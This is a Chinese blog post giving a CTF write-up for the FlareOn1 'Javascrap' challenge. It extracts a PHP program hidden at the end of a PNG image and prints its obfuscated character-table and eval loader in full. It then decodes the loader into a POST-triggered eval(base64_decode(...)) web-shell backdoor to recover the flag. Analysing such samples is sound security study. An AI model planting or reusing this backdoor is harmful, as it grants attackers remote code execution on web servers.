[buuctf.reverse] 102_[FlareOn1]Javascrap

于 2022-06-06 19:00:00 发布
阅读量291 收藏
点赞数
分类专栏: CTF reverse 文章标签: reverse
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/125140077
版权

附件是一个压缩包,包里有说明和另一个压缩包C2.zip打开后是一个index.html和一个图片。

图片用010edit打开发现尾部内嵌的php程序。

 将程序部分剪出

<?php 
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
$do_me="";
for($i=0;$i<count($order);$i++){
	$do_me=$do_me.$terms[$order[$i]];}
echo "".$do_me;
eval($do_me); 
?>

程序很简单,前边是个字符表,后边是字符表的序号,先通过查序号将字符连成字符串然后再用eval执行。

手工执行一下(不大可能直接执行出结果)先将代码取出

<?php
$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; //base64_decode
eval($___($__));

其实就是用第3个base64_decode执行第2个,第2个再执行第3个。所以只要把第3个拿出来就行了,而第3个是下介if语句,内容是这个

//echo "\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D";
echo "a11D\x4FTt\x68a\x74\x44\x4F\x54\x6Aa\x76\x61\x35\x63\x72a\x70\x41T\x66\x6Ca\x72\x65\x44A\x53HonDOTc\x6F\x6D";

然后直接把内容执行一下,再手工把大写对应改一下再加上壳就是flag了。

//a11DOTthatDOTjava5crapATflareDASHonDOTcom
//a11.that.java5crap@flare-on.com
//flag{a11.that.java5crap@flare-on.com}

感觉是misc走错棚了。

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于tf.reverse_sequence()简述
09-18
`tf.reverse_sequence()`是TensorFlow库中的一个函数,用于在给定的轴上反转张量的序列。这个函数在处理序列数据,特别是构建双向循环神经网络(如双向LSTM)时非常有用。在双向RNN中,数据通常需要在时间维度上进行...
CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码
serfend's blog
05-03 1817
CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码 来源:https://buuoj.cn/ 内容: 附件:链接:https://pan.baidu.com/s/1N2bN_TueCtuqTkNlE3tKeA?pwd=hqxm 提取码:hqxm 答案:a11.that.java5crap@flare-on.com 总体思路 文件夹名字是c2,猜测是后门,故发现html文件中存在异常include 查看include的文件发现php代码 解析代码发
REVERSE-PRACTICE-BUUCTF-25
P1umH0的博客
02-27 443
REVERSE-PRACTICE-BUUCTF-25特殊的 BASE64[FlareOn1]Javascrap[WMCTF2020]easy_re[NPUCTF2020]BasicASM 特殊的 BASE64 exe程序,运行后输入,无壳,ida分析 main函数,读取输入,进行变表base64编码,与rightFlag比较验证 在字符串窗口找到变表 用工具解base64即可得到flag [FlareOn1]Javascrap html文件什么都得不到 用010 editor打开那个png文件,在文件
Flare-on Challenge分析报告
weixin_34175509的博客
08-01 253
Flare-on Challenge分析报告 地址:http://flare-on.com C1 C1是一个.NET程序,界面上只有一个DECODE!按钮,摁下按钮后,图片发生变化。由此我们可以分析解题的关键在这个button上。 通过Reflector来反汇编该.NET程序,我么可以看到按钮的事件处理代码如下所示 而Resources中的dat_secret就是我们所要就行...
BUU-[FlareOn1]Bob Doge Wp
P_Black_K的博客
01-12 167
BUU-[FlareOn1]Bob Doge
Recursive-seek-integer-reverse.rar_reverse recursive_seek
09-22
"Recursive-seek-integer-reverse.rar_reverse recursive_seek"这个标题暗示我们,它涉及到使用递归算法来实现一个特定的功能,即反转整数的顺序。描述中提到的例子,输入12345,输出54321,进一步确认了我们要讨论...
nixu.rar_Reverse_字符串 逆序
09-24
标题中的“nixu.rar_Reverse_字符串 逆序”表明这是一个关于字符串逆序操作的教程或代码集合,可能是用汇编语言实现的。在计算机编程中,字符串逆序是一种常见的任务,它涉及到将字符串中的字符顺序反转。这在很多...
eda-reversing-2.zip_reverse engineering_zip
09-24
逆向工程(Reverse Engineering)是软件安全、漏洞分析和程序理解的重要技术,它涉及到对已编译代码的理解,以揭示隐藏的功能、工作原理或潜在的安全问题。在本专题中,我们将探讨逆向工程在处理ZIP文件时的应用,...
buuoj 部分逆向wp(持续更新
苗_的博客
08-06 799
[FlareOn3]Challenge1 点进去sub_401260() 看逻辑是base64解密,点开byte_413000发现是换表base64,直接上脚本: exp import base64 c="x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q" flag="" table="ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/" table
Javascrapt+jquery开发教程
07-23
Javascrapt+jquery开发教程,Javascrapt+jquery开发教程。高清有目录
[BUUCTF]Reverse——[FlareOn1]Bob Doge(c#逆向)
mcmuyanga的博客
04-10 973
[FlareOn1]Bob Doge 例行检查 ,64位程序,c++写的,无壳 本地试运行一下,看看大概的情况,安装程序??? 搞了半天,以为是逆向安装程序,逆了半天没看懂,查了wp之后知道了是要逆向这个安装包安装后的程序。心态炸裂。检查一下安装的程序,32位,c#写的,无壳 试运行一下,点击decode,真·手动狗头 用dnspy打开,找到decode按键上的代码 程序进行了三次运算,得到了text,text2和text3,最后回显text3。不太会用dnspy,不知道dat_
javascrapt 小结
ruoyuanyi的专栏
11-13 946
1,解释型   vs  编译型 解释型,php  javascript 解释型,就是先翻译成计算机能够认识的二进制语言,解释一行代码就执行, 编译型语言:先把代码翻译成计算机能够认识的语言之后,要生成一个二进制文件,exe,以后等再去执行代码的时候就。。。   基本数据类型: 1, 基本数据类型是值传递 2, 引用数据类型是引用传递   Undefined,首先他就是一个值,声
自定义数据分析系统-仅需少量或者不需要sql语句,即可完成数据的获取和数据分析,业务人员也可以轻松使用,获得自己想要的数据进行
最新发布
08-14
自定义数据分析系统——仅需少量或者不需要sql语句,即可完成数据的获取和数据分析,业务人员也可以轻松使用,获得自己想要的数据进行分析。
基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计)
08-14
基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计) 含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,毕业设计、期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 1.基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计) 2.基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计) 3.基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计) 4.基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计) 基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计)基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计)基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计)基于python+django学生信息管理系统设计与实现代码+数据库(高分毕业设计)基于python+django学生信息管理系统设计与实现代码+数据库
基于Android万年历系统APP设计与实现.docx
08-14
基于Android万年历系统APP设计与实现.docx
基于Android选课系统设计与实现.docx
08-14
基于Android选课系统设计与实现.docx
ssm_137_mysql_数据结构课堂学生考勤管理系统_.zip
08-14
结合用户角色的不同主要的功能需求内容如下: 1、系统管理员用户 系统管理员用户可以通过系统后台录入学生及教师信息,包括学号、工号以及个人基础资料,同时可以通过课程管理添加课程信息,通过后台基本信息的录入实现学生请假及学生签到基础内容的添加,管理员可以通过后台查看到学生请假及学生签到信息内容。 2、学生用户 学生用户可以通过个人后台修改个人资料,同时可以结合课程信息内容实现在线学生签到提交,通过后台的学生请假管理模块提交请假申请内容。 3、教师用户 教师用户可以通过管理界面及时查看到学生请假信息,结合学生用户申请内容进行在线审批,查看学生用户在线签到信息及课程安排。
印象阿里政委体系之阿里政委定位与职责精解.pptx
08-14
印象阿里政委体系之阿里政委定位与职责精解.pptx
qmt reverse.reverse_anchor 多因子
12-24
qmt reverse.reverse_anchor 多因子是Quantitative Multiplex Reverse Transcription PCR(多重定量逆转录PCR)技术的一种应用。这种技术基于反转录和多重定量PCR的原理,可以同时检测和定量多个RNA分子的表达水平。它在生物医学研究和临床诊断中具有广泛的应用价值。 首先,qmt reverse.reverse_anchor 多因子技术可以用于研究基因表达的多因子调控机制。通过同时检测多个基因的表达水平,可以更全面地了解不同因子对基因表达的调控作用,揭示基因调控网络中的相互作用。 其次,这种技术也可以用于临床诊断,特别是在癌症的早期诊断和治疗方面具有潜在应用。通过检测癌细胞中多个相关基因的表达水平,可以更准确地评估癌症的类型、分级和预后,为个体化治疗提供依据。 此外,qmt reverse.reverse_anchor 多因子技术在药物筛选和药效评价中也具有重要作用。通过检测细胞中多个关键基因的表达变化,可以快速有效地评估药物对特定疾病的影响,为新药研发和临床治疗提供有力支持。 综上所述,qmt reverse.reverse_anchor 多因子技术是一种强大的分子生物学工具,具有广泛的应用前景。它将为基础科学研究、临床诊断和个体化治疗等领域的发展带来新的机遇和挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值